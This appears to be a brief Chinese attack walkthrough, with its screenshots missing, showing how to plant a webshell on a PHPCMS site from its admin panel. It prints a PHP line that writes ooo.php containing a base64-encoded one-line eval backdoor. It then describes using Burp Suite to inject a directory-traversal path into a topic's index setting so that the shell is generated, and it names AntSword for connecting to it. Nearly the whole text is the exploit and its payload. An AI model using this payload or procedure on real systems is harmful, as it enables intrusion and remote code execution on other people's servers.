登录界面
后台网址
www.phpcms.com/admin.php
进入主页面
代码注入拿webshell
接下来 我直接就上图了
写入一句话木马
<?php file_put_contents('ooo.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4=')); ?>
查看专题
继续添加第二个专题
利用burpsuit拦截将代码写入,意思是将专题dayu2-扩展设置-专题首页里的index写入代码调用专题ooo1中的一句话生成一句话文件
抓包将index除替换:…/…/…/…/html/special/ooo1/index
查看专题 创建成功
利用蚁剑连接一句话 即可
